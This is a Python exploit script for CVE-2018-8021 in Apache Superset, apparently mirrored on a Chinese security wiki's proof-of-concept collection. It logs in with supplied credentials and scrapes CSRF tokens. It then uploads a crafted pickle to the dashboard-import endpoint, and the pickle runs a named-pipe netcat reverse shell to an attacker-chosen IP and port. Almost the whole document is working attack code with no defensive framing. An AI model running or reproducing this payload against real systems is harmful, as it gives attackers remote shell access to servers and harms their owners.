menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Some-PoC-oR-ExP-master chevron_right Apache chevron_right CVE-2018-8021.py
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CVE-2018-8021.py
    3.41 KB / 2021-07-04 19:32:24
        
'''_____________________________________________________________________
|[] SHELL                                                      |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|Original PoC by David May ([email protected])               | |
|_____________________________________________________________________|/|
'''

import sys
import os
from lxml import html
import requests
import argparse

headers_dict = {
		'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
		'DNT': '1',
		'Connection': 'close',
		'Upgrade-Insecure-Requests': '1',
	}

def main() : 
	parser = argparse.ArgumentParser()
	parser.add_argument('-t', '--tcp', help='tcp ip for shell', dest='tcp' , required = True )
	parser.add_argument('-tp', '--tport', help='tcp port for shell', dest='tport', required = True)
	parser.add_argument('-i', '--ip', help='ip', dest='ip', required = True)
	parser.add_argument('-p', '--port', help='port', dest='port', required = True)
	parser.add_argument('-U', '--user', help='User must belong to user with can Import Dashboards on Superset privilege', dest='user', required = True)
	parser.add_argument('-P', '--passw', help='pass must belong to user with can Import Dashboards on Superset privilege', dest='passw', required = True)
	args = parser.parse_args()
	
	# Script arguments
	args.port = args.port
	# Verify these URLs match your environment
	login_URL = 'http://' + args.tcp + ':' + args.tport + '/login/'
	upload_URL = 'http://' + args.tcp + ':' + args.tport + '/superset/import_dashboards'
	if os.path.isfile(str(args.ip)+'_'+str(args.port)+'.pickle'):
		os.remove(str(args.ip)+'_'+str(args.port)+'.pickle')
	headers_dict = {
		'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0',
		'DNT': '1',
		'Connection': 'close',
		'Upgrade-Insecure-Requests': '1',
	}
	evilPickle = open(str(args.ip)+'_'+str(args.port)+'.pickle','w+')
	evilPickle.write('cos\nsystem\n(S\'rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc ' + args.ip + ' ' + args.port + ' 1>/tmp/backpipe\'\ntR.')
	evilPickle.close()
	try : 
		session = requests.session()	
		login_page = session.get(login_URL)
		if login_page.status_code != 200:
			print('Login page not reached')
		login_tree = html.fromstring(login_page.content)
		token = login_tree.xpath('//input[@id="csrf_token"]/@value')
		
		login_data = {
			'token' : token,
			'username' : args.user,
			'password' : args.passw,
		}
		headers_dict['Referer'] = login_URL
		login = session.post(login_URL, headers=headers_dict, data=login_data)	
		upload_page = session.get(upload_URL)
		if upload_page.status_code != 200:
			print('Upload page not reached')
		upload_tree = html.fromstring(upload_page.content)
		token = upload_tree.xpath('//input[@id="csrf_token"]/@value')
		headers_dict['Referer'] = upload_URL
		upload = session.post(upload_URL, headers=headers_dict, data={'token':token}, files={'file':(str(args.ip)+'_'+str(args.port)+'.pickle',open(str(args.ip)+'_'+str(args.port)+'.pickle','rb'),'application/octet-stream')})
		session.close()
		sys.exit()
	except requests.exceptions.ConnectionError : 
		print('Connection Refused, Check The IP and PORT!!!')
	except Exception as e: 
		print('Error :\n\n' , e)
		
	
if __name__ == "__main__" : 
	main()
    links
    file_download